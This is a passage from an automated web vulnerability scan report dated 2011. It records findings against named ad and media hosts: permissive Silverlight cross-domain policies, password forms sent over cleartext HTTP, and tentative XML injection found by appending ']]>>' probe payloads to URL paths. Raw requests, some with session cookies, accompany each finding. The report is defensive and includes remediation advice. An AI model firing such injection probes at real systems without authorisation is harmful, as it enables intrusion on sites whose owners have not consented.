Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.33across.com
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 14:44:03 GMT Server: Apache Last-Modified: Fri, 22 Jul 2011 00:03:04 GMT Accept-Ranges: bytes Content-Length: 335 Connection: close Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="SOAPAction"> <domain uri="*"/> </allow-from> <gr ...[SNIP]...
|
7.3. http://s1.2mdn.net/clientaccesspolicy.xml
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://s1.2mdn.net |
| Path: |
/clientaccesspolicy.xml |
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s1.2mdn.net
|
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 17 Sep 2011 03:39:35 GMT Expires: Sat, 17 Sep 2011 03:26:34 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 35391 Cache-Control: public, max-age=86400
<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="*"/> </allow-from> <grant-to> <resource ...[SNIP]...
|
8. Cleartext submission of password
previous
next
There are 2 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
8.1. http://www.peopleschoice.com/pca/polls/poll.jsp
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/polls/poll.jsp |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
The form contains the following password field:
Request
GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://wonderwall.msn.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:09:44 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Content-Type: text/html;charset=UTF-8 Via: 1.1 pca-www-01.sparkred.com Vary: Accept-Encoding Content-Length: 27072 Connection: close
<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo ...[SNIP]... <div id="pca-hidden-login-controls"> <form method="post"> <label for="username" style="display: none;"> ...[SNIP]... </label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" /> <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" /> ...[SNIP]...
|
8.2. http://www.peopleschoice.com/pca/vote/
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.peopleschoice.com |
| Path: |
/pca/vote/ |
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:- http://www.peopleschoice.com/pca/vote/
The form contains the following password field:
Request
GET /pca/vote/ HTTP/1.1 Host: www.peopleschoice.com Proxy-Connection: keep-alive Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; __utma=61498413.1690544870.1316282695.1316282695.1316282695.1; __utmb=61498413; __utmc=61498413; __utmz=61498413.1316282695.1.1.utmccn=(referral)|utmcsr=wonderwall.msn.com|utmcct=/|utmcmd=referral
|
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 13:04:13 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Content-Type: text/html;charset=UTF-8 Via: 1.1 pca-www-01.sparkred.com Vary: Accept-Encoding Connection: close Content-Length: 12819
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <div id="pca-hidden-login-controls"> <form method="post"> <label for="username" style="display: none;"> ...[SNIP]... </label><input name="password" id="password" maxlength="35" tabindex="2" type="password" style="display: none;" /> <input alt="Login" class="login" id="loginbutton" src="/pca/img/pca_login_submit.png" tabindex="4" title="Login" type="image" /> ...[SNIP]...
|
9. XML injection
previous
next
There are 16 instances of this issue:
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
9.1. http://amch.questionmarket.com/adsc/d913131/10/400008095899/decide.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913131/10/400008095899/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d913131/10/400008095899/decide.php?ord=1316288110 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:40:59 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 2686
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.2. http://amch.questionmarket.com/adsc/d913131/10/922738/decide.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d913131/10/922738/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d913131/10/922738/decide.php?1&noiframe=1 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:40:38 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1306
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.3. http://amch.questionmarket.com/adsc/d924563/3/43741102/decide.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d924563/3/43741102/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d924563/3/43741102/decide.php?ord=1316287959 HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://answerology.delish.com/index.aspx Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:39:37 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1230
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.4. http://amch.questionmarket.com/adsc/d924563/3/43741105/decide.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adsc/d924563/3/43741105/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d924563/3/43741105/decide.php?ord=1316281820 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:04:06 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.5. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/d_layer.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/d_layer.php?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:41:04 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1306
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.6. http://amch.questionmarket.com/adscgen/d_layer.php [REST URL parameter 2]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/d_layer.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/d_layer.php]]>>?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:41:05 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1306
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [REST URL parameter 2]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/dynamiclink.js.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/dynamiclink.js.php]]>>?sub=amch&type=d_layer&survey_num=913131&site=10&code=922738&p=1&protocol=http&lang=&auto_ctl_invite=0&noiframe=1&loc=aHR0cDovL3d3dy5kZWxpc2guY29tL3NlYXJjaC9mYXN0X3NlYXJjaF9yZWNpcGVzP3NlYXJjaF90ZXJtPXhzcytzdWdhcitjYWtlJg== HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake& Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:49:00 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1300
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.8. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/st.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:04:23 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.9. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/st.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>>?survey_num=924563&site=68852647&code=43741105&randnum=6212411 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 13:04:24 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.10. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 1]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/sta.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/sta.php?survey_num=913131&site=161611318102790930&code=8095899&ut_sys=mplx HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:42:47 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 2686
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
|
9.11. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2]
previous
next
Summary
| Severity: |
Medium |
| Confidence: |
Tentative |
| Host: |
http://amch.questionmarket.com |
| Path: |
/adscgen/sta.php |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/sta.php]]>>?survey_num=913131&site=161611318102790930&code=8095899&ut_sys=mplx HTTP/1.1 Host: amch.questionmarket.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://img.mediaplex.com/content/0/16161/131810/CBD_P3Consumer_MyMoneyMap_GoDirect_728x90_V1R1.html?mpck=adfarm.mediaplex.com%2Fad%2Fck%2F16161-131810-27909-30%3Fmpt%3D%5B187845622ER%5D&mpjs=amch.questionmarket.com%2Fadscgen%2Fsta.php%3Fsurvey_num%3D913131%26site%3D161611318102790930%26code%3D8095899%26ut_sys%3Dmplx%20cdn.doubleverify.com%2Fscript312.js%3Fagnc%3D936622%26cmp%3D1059600%26crt%3D%26crtname%3D%26adnet%3D%26dvtagver%3D3.3.1346.2176%26adsrv%3D8%26plc%3D161611318102790930%26advid%3D421303%26sid%3D161611318102790930%26adid%3D%20img-cdn.mediaplex.com%2F0%2F16161%2FNielsen_pixel.js%3Fcrid%3D8095899%26plid%3D161611318102790930&mpt=[187845622ER]&mpvc= Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1
|
Response
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 14:42:49 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 2686
